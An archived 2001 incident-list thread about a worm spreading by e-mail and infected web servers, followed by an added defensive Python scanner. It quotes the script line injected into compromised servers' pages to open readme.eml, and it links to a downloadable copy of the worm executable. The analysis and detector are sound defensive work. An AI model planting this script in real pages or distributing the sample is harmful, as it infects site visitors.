The code written in the default page of a compromised server:

    <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

....

-----Original Message-----
From: Jay D. Dyson [mailto:jdysonat_private]
Sent: Tuesday, 18 September 2001 18:21
To: Incidents List
Cc: Vuln Dev
Subject: Re: New "concept" virus/worm?

On Tue, 18 Sep 2001, Joao Gouveia wrote:

> I kept the executables for analysis, if anyone would like to take a look,
> drop me an email.

Anyone interested in examining the payload can also pick up a copy at http://www.treachery.net/~jdyson/worms/readme.exe (MD5 hash of the payload is at http://www.treachery.net/~jdyson/worms/readme.exe.md5).

> So, what I ask is, does anyone know about this worm? I've done a quick
> search for it and couldn't find anything like it.

It's a two-prong worm. It appears to be primarily disseminated via e-mail, and then launches its attacks on web hosts upon successful infection.

-Jay

Jay D. Dyson -- jdysonat_private
"There's always time for a good cup of coffee"
What doesn't kill us only makes us stronger.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
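
A defender's check for the page modification quoted at the top of this message, as an added example that is not part of the original thread: it walks a web root and reports pages carrying a script block that opens a .eml file. The function names, the extension list and the sample tree are constructed for illustration, and listing stray .eml files alongside the hits is an assumption based on the relative URL in the snippet.

```python
import re
import tempfile
from pathlib import Path

# Matches a <script> block that calls window.open() on a .eml file, the shape
# of the snippet quoted in the message. Quotes, spacing and case may vary.
INJECTED = re.compile(
    r"<script[^>]*>\s*window\.open\(\s*[\"']([^\"']+\.eml)[\"']",
    re.IGNORECASE,
)
WEB_EXTENSIONS = {".htm", ".html", ".asp"}  # assumption: page types to check

def find_injected(text):
    """Return the .eml names opened by matching script blocks in text."""
    return [m.group(1) for m in INJECTED.finditer(text)]

def scan_webroot(root):
    """Return ({page: [eml names]}, [stray .eml files]) for everything under root."""
    root = Path(root)
    hits, stray = {}, []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        suffix = path.suffix.lower()
        if suffix == ".eml":
            stray.append(rel)  # assumption: a .eml in a web root is worth a look
        elif suffix in WEB_EXTENSIONS:
            # latin-1 decodes any byte, so odd encodings cannot hide a match
            found = find_injected(path.read_bytes().decode("latin-1"))
            if found:
                hits[rel] = found
    return hits, stray

def demo():
    """Build a constructed web root in a temp directory and scan it."""
    clean = "<html><body>Welcome</body></html>"
    snippet = ('<html><script language="JavaScript">window.open("readme.eml", '
               'null, "resizable=no,top=6000,left=6000")</script></html>')
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text(clean + snippet)  # constructed sample
        (root / "about.htm").write_text(clean)
        (root / "readme.eml").write_text("constructed placeholder")
        return scan_webroot(root)

if __name__ == "__main__":
    print(demo())
```

Comparing flagged pages against a known-good copy or backup confirms whether the script block was there before the incident.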
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 12:10:13 PDT